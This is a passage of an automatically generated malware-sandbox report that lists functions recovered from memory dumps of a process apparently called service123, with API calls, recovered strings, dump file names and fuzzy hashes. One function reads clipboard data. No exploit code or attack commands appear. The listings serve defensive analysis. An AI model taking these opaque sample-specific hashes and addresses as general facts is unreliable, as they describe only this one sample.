malloc.MSVCRT ref: 008F12EB
strlen.MSVCRT ref: 008F1323
malloc.MSVCRT ref: 008F132E
memcpy.MSVCRT ref: 008F1344

Memory Dump Source

Source File: 00000005.00000002.2697006309.00000000008F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2696986232.00000000008F0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697022046.00000000008FA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697036057.00000000008FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697049495.0000000000901000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_8f0000_service123.jbxd

Similarity

API ID: malloc$memcpystrlen
String ID:
API String ID: 3553820921-0
Opcode ID: 6d2dbbfedc85c13400a5f9871c35d3e1535e2bf50f66f5ba2867f4e3edf9695a
Instruction ID: 827551883ebf892cfe525fd391f44ee9f5b351802457349a8164ec961af2d8da
Opcode Fuzzy Hash: 6d2dbbfedc85c13400a5f9871c35d3e1535e2bf50f66f5ba2867f4e3edf9695a
Instruction Fuzzy Hash: DB310375A04B19CFCB10DF79D884B69BBE2FB88300F158529DA48D7311DB35A906CF95

Function 008F13BB Relevance: 5.1, APIs: 4, Instructions: 66
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.MSVCRT ref: 008F12EB
strlen.MSVCRT ref: 008F1323
malloc.MSVCRT ref: 008F132E
memcpy.MSVCRT ref: 008F1344

Memory Dump Source

Source File: 00000005.00000002.2697006309.00000000008F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2696986232.00000000008F0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697022046.00000000008FA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697036057.00000000008FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697049495.0000000000901000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_8f0000_service123.jbxd

Similarity

API ID: malloc$memcpystrlen
String ID:
API String ID: 3553820921-0
Opcode ID: 9ddf5f82973e48872362e6072d5783e95fba21db120dcaac088b31bcb0137076
Instruction ID: e34d7602041ffbdb1cee117e670995d2a6d0e58282af3ec621bf4a1af3cb323c
Opcode Fuzzy Hash: 9ddf5f82973e48872362e6072d5783e95fba21db120dcaac088b31bcb0137076
Instruction Fuzzy Hash: BF21C3B5905B19CFCB14DF79D884A6DB7F2FB88300F118529DA48A7310DB30A906DF96

Function 6C2AB1A0 Relevance: 1.4, APIs: 1, Instructions: 144
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4fce498fcb32d7b4ad4c28a72299c36ba1d426be5cd9ea450967233e32e7c0ec
Instruction ID: 13207833f378bcea7e82d9b7c08a9158f740f14ecea7427fd218b7dc8efa07f7
Opcode Fuzzy Hash: 4fce498fcb32d7b4ad4c28a72299c36ba1d426be5cd9ea450967233e32e7c0ec
Instruction Fuzzy Hash: 58518E75A0530ACFC700DFABD08055ABBF4FF86308B65455AE9588BB15E730E845CFA2

Function 6C2AB310 Relevance: 1.3, APIs: 1, Instructions: 95
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a53f912b1528fd575990d256dd986af5472fc191589d5d39880f1ad4950e37b5
Instruction ID: 2e3bebd904315c1027e099293e18f9630cc171995360855124026fc87d3bfb39
Opcode Fuzzy Hash: a53f912b1528fd575990d256dd986af5472fc191589d5d39880f1ad4950e37b5
Instruction Fuzzy Hash: 3131AF71705209CFDB119FABC4C065A7BB8BB46318BA94668DE108FF59E730D806CB62

Non-executed Functions

Function 6C29CD00 Relevance: 33.4, APIs: 22, Instructions: 445stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C29CD7D

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 01780e2455ecb90913fed7d4ef580a915b38e220ee08284dad1a0c5359e1acb4
Instruction ID: 8d8f2cac26b460fc4e77a8dbc3b08bee153eafd123bf742424eac9e7387bcaba
Opcode Fuzzy Hash: 01780e2455ecb90913fed7d4ef580a915b38e220ee08284dad1a0c5359e1acb4
Instruction Fuzzy Hash: 4402497150875A8FD700CF2AC044795FBE2AF86318F0D826EECE957792C776A409DB81

Function 6C2A0FC0 Relevance: 22.6, APIs: 8, Strings: 4, Instructions: 1647stringCOMMON

Download Yara Rule

APIs

localeconv.MSVCRT ref: 6C2A0FCA
strlen.MSVCRT ref: 6C2A0FD4

Strings

, xrefs: 6C2A240F
!, xrefs: 6C2A2C08
5, xrefs: 6C2A14D2
inity, xrefs: 6C2A1E21

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: localeconvstrlen
String ID: $!$5$inity
API String ID: 186660782-1328200385
Opcode ID: 2da03762b95493cb6039eba206e038679df3287a6da9aa27bf732f0fd9a05f44
Instruction ID: 38f293815da2a72a885bf04738a73ec759005f648582e0d6768b27d5755d26d1
Opcode Fuzzy Hash: 2da03762b95493cb6039eba206e038679df3287a6da9aa27bf732f0fd9a05f44
Instruction Fuzzy Hash: 13F248B5A08389CFD320CFA9C48479ABBE1BF89318F11891DE8D997750D775E846CB42

Function 6C318280 Relevance: 17.7, Strings: 14, Instructions: 166COMMON

Download Yara Rule

Strings

rand_s, xrefs: 6C318467
rdseed, xrefs: 6C3182C8
Genu, xrefs: 6C31841E
default, xrefs: 6C31829F
Genu, xrefs: 6C31838F
hardware, xrefs: 6C318450
rdrand, xrefs: 6C318358
Auth, xrefs: 6C318397
Genu, xrefs: 6C318307
random_device::random_device(const std::string&): unsupported token, xrefs: 6C318482
Auth, xrefs: 6C318426
rdrnd, xrefs: 6C3183C8
Auth, xrefs: 6C3182FF
random_device::random_device(const std::string&): device not available, xrefs: 6C318348

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: memcmpstrlen
String ID: Auth$Auth$Auth$Genu$Genu$Genu$default$hardware$rand_s$random_device::random_device(const std::string&): device not available$random_device::random_device(const std::string&): unsupported token$rdrand$rdrnd$rdseed
API String ID: 3108337309-1359127009
Opcode ID: 26351df7cd8a02d951cd0acf42b21e9210a503410600c5a777d70492c13d9e4a
Instruction ID: 92240d773d2b5a10d607b2aa0b5cfc8a4b493d3ecab05dbee4b242ed9ab174dc
Opcode Fuzzy Hash: 26351df7cd8a02d951cd0acf42b21e9210a503410600c5a777d70492c13d9e4a
Instruction Fuzzy Hash: 374129B621D3814FE708AA39D58131A76A6B740318F298D3EC88297F51E737C555CF2B

Function 6C29EE50 Relevance: 12.5, APIs: 8, Instructions: 494COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 6C29F18B
malloc.MSVCRT ref: 6C29F1A8

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 11778bf4a78c6efff3bc89c2f3abba8bfbe71ebae3ed8c2138e530f0f0906995
Instruction ID: 56c51af5e7a244ef51da20e6e09e9808352780c9eb303dae9379ff32089ede58
Opcode Fuzzy Hash: 11778bf4a78c6efff3bc89c2f3abba8bfbe71ebae3ed8c2138e530f0f0906995
Instruction Fuzzy Hash: E0126C75A0870A8FC750CF1AC08065BB7E2BF88358F558A2DFC9997B54D734E809CB92

Function 6C2BE490 Relevance: 12.2, APIs: 6, Strings: 2, Instructions: 219stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C2BE4BA
strlen.MSVCRT ref: 6C2BE52A

Strings

basic_string: construction from null is not valid, xrefs: 6C2BE4F2, 6C2BE562, 6C2BE5D2
basic_string: construction from null is not valid, xrefs: 6C2BE61F, 6C2BE670, 6C2BE6C0

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: strlen
String ID: basic_string: construction from null is not valid$basic_string: construction from null is not valid
API String ID: 39653677-1250104765
Opcode ID: 8a70651f5ec89ca0ddd4576773a62ccb7e988a51e003fa3869f5b00dcd4928f3
Instruction ID: 26d4b3ffb4ca54ac8335871deffe15c9875f70b7a28f4e043806fa17b38718e4
Opcode Fuzzy Hash: 8a70651f5ec89ca0ddd4576773a62ccb7e988a51e003fa3869f5b00dcd4928f3
Instruction Fuzzy Hash: 996172F1A056158FCB00BF2CD48585ABBE4BF45218F0649ADEC859B715E331D899CFD2

Function 6C2B0610 Relevance: 10.7, APIs: 5, Strings: 2, Instructions: 212stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C2B0636
memcmp.MSVCRT ref: 6C2B0659
memcmp.MSVCRT ref: 6C2B06CF
memcmp.MSVCRT ref: 6C2B0741

Part of subcall function 6C35AB60: strlen.MSVCRT ref: 6C35AB6E

memcmp.MSVCRT ref: 6C2B07D5

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6C2B0680, 6C2B06F4, 6C2B0767, 6C2B07FC, 6C2B0818
basic_string::compare, xrefs: 6C2B0678, 6C2B06EC, 6C2B075F, 6C2B07F4, 6C2B0810

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: memcmp$strlen
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::compare
API String ID: 3738950036-1697194757
Opcode ID: ffcd64dfc4a5cd6aec6003d7955f28a797b8a606a73c3eb3c42c8456e102787b
Instruction ID: 46bbd95b6a84a80c510aef46b37457b85e4a80f42be92467cbd6eafb035753be
Opcode Fuzzy Hash: ffcd64dfc4a5cd6aec6003d7955f28a797b8a606a73c3eb3c42c8456e102787b
Instruction Fuzzy Hash: 4E6158B6A093059FC300AF6AC9C095EFBE5AFC8788F54892DE9C897714D331D844DB92

Function 6C2A9B99 Relevance: 10.6, APIs: 7, Instructions: 81clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 6C2A9BA0
GetClipboardData.USER32 ref: 6C2A9BE7
GlobalLock.KERNEL32 ref: 6C2A9BF9
GlobalUnlock.KERNEL32 ref: 6C2A9C1A
CloseClipboard.USER32 ref: 6C2A9C23

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: Clipboard$Global$CloseDataLockOpenUnlock
String ID:
API String ID: 1006321803-0
Opcode ID: a39b5bb06bc6c00609c2743a046f6c4d8784faf8a6a77fa88c15ec8e2f3693e0
Instruction ID: 03265cd33fe9f3f4cb9b64bc742dff07a146b4240a287cd564972dd8f5d7dc8d
Opcode Fuzzy Hash: a39b5bb06bc6c00609c2743a046f6c4d8784faf8a6a77fa88c15ec8e2f3693e0
Instruction Fuzzy Hash: 8421AEB2A087018FDB00BF7DC54926EBBF4BB66305F444928E88986744EB35C4598B97

Function 6C2A70C0 Relevance: 9.6, APIs: 6, Instructions: 649COMMON

Download Yara Rule

APIs

localeconv.MSVCRT ref: 6C2A70C7
memset.MSVCRT ref: 6C2A7217

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: localeconvmemset
String ID:
API String ID: 2367598729-0
Opcode ID: a7548664f3c36f81f616b22456b9dab7be356ddfccf909dff4747fe51ea3dc24
Instruction ID: f0a7162184bb15b1f62d0359b693b7f4a756e364e6b83c2a0351a36371db97a4
Opcode Fuzzy Hash: a7548664f3c36f81f616b22456b9dab7be356ddfccf909dff4747fe51ea3dc24
Instruction Fuzzy Hash: 2142067160830A8FD700CFA9C48075ABBE2BF85B09F15492EFC948B749D775D94ACB86

Function 6C2A5880 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 1506COMMON

Download Yara Rule

Strings

NaN, xrefs: 6C2A5B5F
, xrefs: 6C2A6D95
, xrefs: 6C2A7074
Infinity, xrefs: 6C2A5BE0

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID:
String ID: $ $Infinity$NaN
API String ID: 0-3274152445
Opcode ID: e009b972d14021f5ce422b7aaf3387d9af94cf8267c4a03f2b01073fd0f130a7
Instruction ID: dac822cbe904261843dc741ac00ae53de94835d26b74cf91a787a2e249caf2b6
Opcode Fuzzy Hash: e009b972d14021f5ce422b7aaf3387d9af94cf8267c4a03f2b01073fd0f130a7
Instruction Fuzzy Hash: 8AE234B1A09786CFD310CFA9C18074AFBE0BF89748F14892DE89597751E775D8468F82

Function 008F51B0 Relevance: 6.0, APIs: 1, Strings: 2, Instructions: 1506COMMON

Download Yara Rule

Strings

, xrefs: 008F66C5
, xrefs: 008F69A4

Memory Dump Source

Source File: 00000005.00000002.2697006309.00000000008F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2696986232.00000000008F0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697022046.00000000008FA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697036057.00000000008FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697049495.0000000000901000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_8f0000_service123.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-227171996
Opcode ID: 7dec5c238cd8f145b5669e1e76a28aa194b4af2a03a002918d8a07d07ba7e9f4
Instruction ID: d79998942b0d159558662c1d57cbdd84f3a4dc1f1d55aabca90820bf713c5bc4
Opcode Fuzzy Hash: 7dec5c238cd8f145b5669e1e76a28aa194b4af2a03a002918d8a07d07ba7e9f4
Instruction Fuzzy Hash: C9E222B1A087498FD710DF29C18072ABBE0FF88758F148A1DEA99D7351E775E8548F82

Function 008F3E20 Relevance: 5.4, Strings: 4, Instructions: 351COMMON

Download Yara Rule

Strings

gfff, xrefs: 008F3F2C
., xrefs: 008F4114
gfff, xrefs: 008F3F43
@, xrefs: 008F3FD9

Memory Dump Source

Source File: 00000005.00000002.2697006309.00000000008F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2696986232.00000000008F0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697022046.00000000008FA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697036057.00000000008FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2697049495.0000000000901000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_8f0000_service123.jbxd

Similarity

API ID:
String ID: .$@$gfff$gfff
API String ID: 0-2633265772
Opcode ID: 8459d8207e057e620cf1d9af03855443049108a225ce8fe639410900789573df
Instruction ID: 1fe0eca67df00ac1f18f0e74c3da8f7948634037cc5bd40aad8475b359a7a9ac
Opcode Fuzzy Hash: 8459d8207e057e620cf1d9af03855443049108a225ce8fe639410900789573df
Instruction Fuzzy Hash: 7CD18F7160830E8BD714DE39C88032BBBE1FFD4344F18892EEA55CB655E770D9898792

Function 6C2A44F0 Relevance: 5.4, Strings: 4, Instructions: 351COMMON

Download Yara Rule

Strings

., xrefs: 6C2A47E4
@, xrefs: 6C2A46A9
gfff, xrefs: 6C2A45FC
gfff, xrefs: 6C2A4613

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID:
String ID: .$@$gfff$gfff
API String ID: 0-2633265772
Opcode ID: 8626a3e6e77548aa8c80ec26b31963b047f7067a9e1e968e0f87eb2c543a7be7
Instruction ID: 4c9920106f528c034eadf6a64c195af8b641c22f2289f60b708e64aa504a807d
Opcode Fuzzy Hash: 8626a3e6e77548aa8c80ec26b31963b047f7067a9e1e968e0f87eb2c543a7be7
Instruction Fuzzy Hash: 0BD1E87160834A8FD704CFA9C88074BB7E2AFC5749F18D52DEC588BB55DB70D94A8B82

Function 6C332EF0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 137COMMON

Download Yara Rule

Strings

basic_string: construction from null is not valid, xrefs: 6C333000

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID:
String ID: basic_string: construction from null is not valid
API String ID: 0-2991274800
Opcode ID: 69c7a1964fc69588494c91a86ea987c461675c4e03503ce066bf8ca71fc5f2af
Instruction ID: afb61f9793bc8fc263627242b13376247033f66fe5c0cbe62ff3c73ae45edec6
Opcode Fuzzy Hash: 69c7a1964fc69588494c91a86ea987c461675c4e03503ce066bf8ca71fc5f2af
Instruction Fuzzy Hash: 8B419BB29092608FC714DF2DD58064AFBE4EF99314F15D96EE8888B31AD331D845CBE2

Function 6C3304E0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 93COMMON

Download Yara Rule

APIs

memmove.MSVCRT ref: 6C330550
memset.MSVCRT ref: 6C330574

Strings

basic_string::_M_replace_aux, xrefs: 6C3305F0

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: memmovememset
String ID: basic_string::_M_replace_aux
API String ID: 1288253900-2536181960
Opcode ID: e171ec52030ef16f5d9205597f181fc66d38ac6ec0472b19e08fc92b1ab8147c
Instruction ID: 5356672230b109d0efea98d43ae05b993a6992b4dc32c75a595f3f3c172a1c7a
Opcode Fuzzy Hash: e171ec52030ef16f5d9205597f181fc66d38ac6ec0472b19e08fc92b1ab8147c
Instruction Fuzzy Hash: 72318E7660D6A08FD7019F6CC4C062ABBF1AF86604F14996EE8A88B715D332C844CF62

Function 6C3035F0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 92COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 6C303648
memcpy.MSVCRT ref: 6C3036C1

Part of subcall function 6C305340: memcpy.MSVCRT ref: 6C3053D0

Strings

basic_string::_M_replace_aux, xrefs: 6C303670

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
